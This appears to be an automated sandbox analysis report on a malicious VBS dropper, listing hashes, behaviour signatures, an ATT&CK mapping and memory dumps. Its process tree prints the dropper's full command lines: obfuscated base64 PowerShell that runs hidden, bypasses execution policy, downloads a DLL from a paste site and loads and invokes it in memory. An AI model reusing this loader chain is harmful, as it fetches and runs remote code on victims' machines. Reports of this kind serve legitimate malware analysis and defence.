69533ca8040278fd915f469d1165ae8e78b16c7d32369a715da745a7592e8094

General

Target

e2a66d3573ce5e66dacf16840feab675adb111081834fc198d42fc6601acd931.vbs
Size

160KB
MD5

e7eb16683c5e373b8466a0ac1d2a5bd4
SHA1

a286dd06a1cfc628c2be2fa1fd8c8992bc455415
SHA256

e2a66d3573ce5e66dacf16840feab675adb111081834fc198d42fc6601acd931
SHA512

07ae198a45f0db3d087d6d9cc191536078f16aced919418651fd00f41c38bdf0ac456f4624ace849fc6c01660b7e907a2ab5cac1bca8141cfc28da6b6e316ffd
SSDEEP

192:n444v444QT44v444444cOggjz44v4144v4K444b44KHVJ4hXFBl/U0zsBy0hfLb3:IoOggj4+gBGU1jt

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://wtools.io/code/dl/bE0V

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

4 1416 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

1868 powershell.exe
1416 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1868 powershell.exe
Token: SeDebugPrivilege 1416 powershell.exe

flow	pid	process
4	1416	powershell.exe

pid	process
1868	powershell.exe
1416	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1868	powershell.exe
Token: SeDebugPrivilege	1416	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

WScript.exepowershell.exe

description	pid	process	target process
PID 1612 wrote to memory of 1868	1612	WScript.exe	powershell.exe
PID 1612 wrote to memory of 1868	1612	WScript.exe	powershell.exe
PID 1612 wrote to memory of 1868	1612	WScript.exe	powershell.exe
PID 1868 wrote to memory of 1416	1868	powershell.exe	powershell.exe
PID 1868 wrote to memory of 1416	1868	powershell.exe	powershell.exe
PID 1868 wrote to memory of 1416	1868	powershell.exe	powershell.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e2a66d3573ce5e66dacf16840feab675adb111081834fc198d42fc6601acd931.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1612

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwAlAC✌✌✌AJwA7AFsAQgB5AHQAZQBbAF0AXQAgACQARABMAEwAIAA9ACAAWwBzAHkAcwB0AG✌✌✌AbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHcAdABvAG8AbABzAC4AaQBvAC8AYwBvAGQAZQAvAGQAbAAvAGIARQAwAFYAJwApACkAOwBbAHMAeQBzAHQAZQBtAC4AQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKAAkAEQATABMACkALgBHAG✌✌✌AdAB✌✌✌AHkAcABlACgAJwB4AEsAdgBLAGsAdQBOAFoALgBVAEcAbAB5AG0AegBVAGcAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAF✌✌✌ARABzAFMAaQBEAGIAYgAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAJwBiADMAMAA0AD✌✌✌AYQA1AGIANAA2ADgAMAAtADIAMQA1ADkALQA0ADYAYwA0AC0AOAA2ADMAZgAtADYAOQAyADMAMQA4AGYAZQA9AG4AZQBrAG8AdAAmAGEAaQBkAG✌✌✌AbQA9AHQAbABhAD8AdAB4AHQALgBvAGQAbABhAHAAcwBlAHIALQB0AGkAYgBGADIAJQBuAG8AaQBjAGEAegBpAGwAYQB1AHQAYwBBAC8AbwAvAG0AbwBjAC4AdABvAHAAcwBwAHAAYQAuAG✌✌✌AOABiAGIAZgAtADIAMgAwADIALQBuAG8AaQBjAGEAbQBhAHIAZwBvAHIAcAAvAGIALwAwAHYALwBtAG8AYwAuAHMAaQBwAGEAZQBsAGcAbwBvAGcALgBlAGcAYQByAG8AdABzAG✌✌✌AcwBhAGIAZQByAGkAZgAvAC8AOgBzAHAAdAB0AGgAJwAgACwAIAAkAFIAbwBkAGEAQwBvAHAAeQAgACwAIAAnAFIAbwBkAGEAJwAgACkAKQA=';$OWjuxDt = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $iUqm.replace('✌✌✌','U') ) );$OWjuxDt = $OWjuxDt.replace('%جزدییامတجزدییامတ%', 'C:\Users\Admin\AppData\Local\Temp\e2a66d3573ce5e66dacf16840feab675adb111081834fc198d42fc6601acd931.vbs');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxDt
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1868

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$RodaCopy = '%%';[Byte[]] $DLL = [system.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://wtools.io/code/dl/bE0V'));[system.AppDomain]::CurrentDomain.Load($DLL).GetType('xKvKkuNZ.UGlymzUg').GetMethod('UDsSiDbb').Invoke($null, [object[]] ('b3045a5b4680-2159-46c4-863f-692318fe=nekot&aidem=tla?txt.odlapser-tibF2%noicazilautcA/o/moc.topsppa.e8bbf-2202-noicamargorp/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $RodaCopy , 'Roda' ))"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1416

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
add39f434c21a003a738ebaf83d147b1

SHA1
77ae79395e93eb84de5c86ee1dd7c1435aceb948

SHA256
03b3a2e2629e02f84661b006aadd0c068b73cf5c3644f0d45d3d785dfb202f10

SHA512
48e09c38a20bbd2296df7a31f98894e1050f4d8554e4d8d731b6be568da3a6cee87844fae517f5dd33a620e4ade4741ce691f6f5460963666289f189948e8fff

Download Submit
memory/1416-65-0x000007FEF3A10000-0x000007FEF4433000-memory.dmp

Filesize
10.1MB

Download
memory/1416-71-0x000000000255B000-0x000000000257A000-memory.dmp

Filesize
124KB

Download
memory/1416-70-0x0000000002554000-0x0000000002557000-memory.dmp

Filesize
12KB

Download
memory/1416-68-0x000000000255B000-0x000000000257A000-memory.dmp

Filesize
124KB

Download
memory/1416-67-0x0000000002554000-0x0000000002557000-memory.dmp

Filesize
12KB

Download
memory/1416-61-0x0000000000000000-mapping.dmp

Download
memory/1416-66-0x000007FEF2EB0000-0x000007FEF3A0D000-memory.dmp

Filesize
11.4MB

Download
memory/1612-54-0x000007FEFBD91000-0x000007FEFBD93000-memory.dmp

Filesize
8KB

Download
memory/1868-58-0x000007FEF2EB0000-0x000007FEF3A0D000-memory.dmp

Filesize
11.4MB

Download
memory/1868-64-0x00000000027BB000-0x00000000027DA000-memory.dmp

Filesize
124KB

Download
memory/1868-60-0x000000001B6F0000-0x000000001B9EF000-memory.dmp

Filesize
3.0MB

Download
memory/1868-59-0x00000000027B4000-0x00000000027B7000-memory.dmp

Filesize
12KB

Download
memory/1868-69-0x00000000027B4000-0x00000000027B7000-memory.dmp

Filesize
12KB

Download
memory/1868-57-0x000007FEF3A10000-0x000007FEF4433000-memory.dmp

Filesize
10.1MB

Download
memory/1868-55-0x0000000000000000-mapping.dmp

Download
memory/1868-72-0x00000000027BB000-0x00000000027DA000-memory.dmp

Filesize
124KB

Download

Analysis

Sharing